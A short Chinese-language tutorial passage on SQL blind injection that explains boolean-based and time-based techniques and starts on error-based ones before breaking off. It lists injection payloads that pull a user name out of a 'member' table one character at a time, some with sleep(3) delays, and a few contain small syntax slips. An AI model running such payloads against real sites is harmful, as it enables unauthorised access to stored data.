前言
sql 盲注是对于那些页面没有回显的错误,只能依靠自己的经验去一点一点猜测,这就比较耗费时间了。
如果数据库运行返回结果时只反馈对错不会返回数据库当中的信息,此时可以采用逻辑判断是否正确的盲注来获取信息
1.布尔盲注。某些查询是不需要返回结果的,金判断查询语句是否正确执行,所以其返回可以看做一个布尔值,正常显示为true,报错或是其他不正常显示为false.
SELECT userid FROM member WHERE u_name=$name AND u_pass=$pass; 注入语句 name=-1' and (select mid(u_name,1,1) from member where userid=1)='a' name=-1' and (select mid(u_name,2,1) from member where userid=1)='d' name=-1' and (select mid(u_name,3,1) from member where userid=1)='m' name=-1' and (select mid(u_name,4,1) from member where userid=1)='i’ name=-1' and (select mid(u_name,5,1) from member where userid=1)='n'
2.时间盲注。布尔盲注的关键字符带不进去,这时候可以使用sleep来进行时间盲注,取页面执行时间(结束时间-开始时间)来判断sleep函数是否正常执行,所以其是否正常执行可以看做一个布尔值,正常显示为true,报错或是其他不正常显示为false ```php 查询语句
SELECT userid FROM member WHERE u_name=$name AND u_pass=$pass; 注入语句
name=-1' and (select mid(u_name,1,1) from member where userid=1)='a' and (select sleep(3))
name=-1' and (select mid(u_name,2,1) from member where userid=1)='d' and (select sleep(3))
name=-1' and (select mid(u_name,3,1) from member where userid=1)='m' and (select sleep(3))
name=-1' and (select mid(u_name,4,1) from member where userid=1)='i' and (select sleep(3))
name=-1' and (select mid(u_name,5,1) from member where userid=1)='n' and (select sleep(3) ``` > 3.报错型盲注。 > 常见报错注入函数<br> left(a,b)从左侧截取 a 的前 b 位:left(database(),1)>'s' substr(a,b,c)从 b 位置开始, 截取字符串 a 的 c 长度。 ascii() 将某个字符转换为 ascii 值:ascii(substr(user),1,1))=101# mid(a,b,c)从位置 b 开始, 截取 a 字符串的 c 位:
